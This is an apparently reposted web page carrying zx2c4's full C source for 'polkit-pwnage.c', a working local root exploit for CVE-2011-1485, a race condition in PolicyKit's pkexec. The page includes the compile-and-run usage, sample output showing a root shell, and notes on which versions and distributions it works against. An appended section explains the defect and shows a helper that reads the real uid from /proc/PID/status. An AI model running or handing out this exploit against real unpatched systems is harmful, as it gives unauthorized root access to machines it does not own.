Linux polkitd vulnerability: CVE-2011-1485, Red Hat PolicyKit pkexec / polkitd daemon race condition (vulnerability details)


/* polkit-pwnage.c
 *
 *
 * ==============================
 * =     PolicyKit Pwnage       =
 * =         by zx2c4           =
 * =       Sept 2, 2011         =
 * ==============================
 *
 *
 * Howdy folks,
 *
 * This exploits CVE-2011-1485, a race condition in PolicyKit.
 *
 * davidz25 explains:
 *
 * --begin--
 * Briefly, the problem is that the UID for the parent process of pkexec(1) is
 * read from /proc by stat(2)'ing /proc/PID. The problem with this is that
 * this returns the effective uid of the process which can easily be set to 0
 * by invoking a setuid-root binary such as /usr/bin/chsh in the parent
 * process of pkexec(1). Instead we are really interested in the real-user-id.
 * While there's a check in pkexec.c to avoid this problem (by comparing it to
 * what we expect the uid to be - namely that of the pkexec.c process itself which
 * is the uid of the parent process at pkexec-spawn-time), there is still a short
 * window where an attacker can fool pkexec/polkitd into thinking that the parent
 * process has uid 0 and is therefore authorized. It's pretty hard to hit this
 * window - I actually don't know if it can be made to work in practice.
 * --end--
 *
 * Well, here is, in fact, how it's made to work in practice. There is as he said an
 * attempted mitigation, and the way to trigger that mitigation path is something
 * like this:
 *
 * $ sudo -u `whoami` pkexec sh
 * User of caller (0) does not match our uid (1000)
 *
 * Not what we want. So the trick is to execl to a suid at just the precise moment
 * /proc/PID is being stat(2)'d. We use inotify to learn exactly when it's accessed,
 * and execl to the suid binary as our very next instruction.
 *
 * ** Usage **
 * $ pkexec --version
 * pkexec version 0.101
 * $ gcc polkit-pwnage.c -o pwnit
 * $ ./pwnit
 * [+] Configuring inotify for proper pid.
 * [+] Launching pkexec.
 * sh-4.2# whoami
 * root
 * sh-4.2# id
 * uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm)
 * sh-4.2#
 *
 * ** Targets **
 * This exploit is known to work on polkit-1 <= 0.101. However, Ubuntu, which
 * as of writing uses 0.101, has backported 0.102's bug fix. A way to check
 * this is by looking at the mtime of /usr/bin/pkexec -- April 22, 2011 or
 * later and you're out of luck. It's likely other distributions do the same.
 * Fortunately, this exploit is clean enough that you can try it out without
 * too much collateral.
 *
 *
 * greets to djrbliss and davidz25.
 *
 * - zx2c4
 * 2-sept-2011
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/inotify.h>

int main(int argc, char **argv)
{
	printf("=============================\n");
	printf("=     PolicyKit Pwnage      =\n");
	printf("=         by zx2c4          =\n");
	printf("=       Sept 2, 2011        =\n");
	printf("=============================\n\n");

	if (fork()) {
		/* Parent: wait until /proc/PID is accessed, then exec a suid binary. */
		int fd;
		char pid_path[1024];
		sprintf(pid_path, "/proc/%i", getpid());
		printf("[+] Configuring inotify for proper pid.\n");
		close(0); close(1); close(2);
		fd = inotify_init();
		if (fd < 0)
			perror("[-] inotify_init");
		inotify_add_watch(fd, pid_path, IN_ACCESS);
		read(fd, NULL, 0);
		execl("/usr/bin/chsh", "chsh", NULL);
	} else {
		/* Child: give the parent a moment to arm the watch, then run pkexec. */
		sleep(1);
		printf("[+] Launching pkexec.\n");
		execl("/usr/bin/pkexec", "pkexec", "/bin/sh", NULL);
	}
	return 0;
}
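Added illustration of the defect davidz25 describes above (this is not part of zx2c4's exploit and not polkit's own code): pkexec 0.101 derived the caller's uid from stat(2) on /proc/PID, whose st_uid reflects the effective uid, while the authorization decision needs the real uid. The helper below reads the Uid: line of /proc/PID/status instead, whose first field is the real uid and is unchanged by an exec of a setuid-root binary; the page does not describe how the 0.102 fix itself was implemented, and the sample status text is constructed.

```c
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>

/* Parse the "Uid:" line of /proc/PID/status text. Its four fields are
 * real, effective, saved and filesystem uid; an authorization check
 * should be keyed on the first one, not on the owner that stat(2) on
 * /proc/PID reports (the effective uid). Returns 0 on success, -1 if
 * the line is missing or malformed. */
int parse_status_uids(const char *status, uid_t *real, uid_t *effective)
{
    const char *line = status;
    while (line && *line) {
        if (strncmp(line, "Uid:", 4) == 0) {
            unsigned long r, e;
            if (sscanf(line + 4, "%lu %lu", &r, &e) != 2)
                return -1;
            *real = (uid_t)r;
            *effective = (uid_t)e;
            return 0;
        }
        line = strchr(line, '\n');
        if (line)
            line++;
    }
    return -1;
}

/* Read /proc/PID/status for a live process and extract both uids. */
int read_proc_uids(pid_t pid, uid_t *real, uid_t *effective)
{
    char path[64], buf[4096];
    size_t n;
    snprintf(path, sizeof path, "/proc/%ld/status", (long)pid);
    FILE *f = fopen(path, "r");
    if (!f)
        return -1;
    n = fread(buf, 1, sizeof buf - 1, f);
    fclose(f);
    buf[n] = '\0';
    return parse_status_uids(buf, real, effective);
}

/* Constructed sample: a process whose real uid is 1000 but which is
 * currently running with effective uid 0 after exec'ing a setuid-root
 * binary such as chsh. stat(/proc/4242) would report owner 0 here. */
const char *sample_status =
    "Name:\tchsh\nState:\tS (sleeping)\nPid:\t4242\n"
    "Uid:\t1000\t0\t0\t0\nGid:\t1000\t1000\t1000\t1000\n";
```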


Publisher: 全栈程序员 user IM; please credit the source when reposting: https://javaforall.cn/148178.html. Original link: https://javaforall.cn
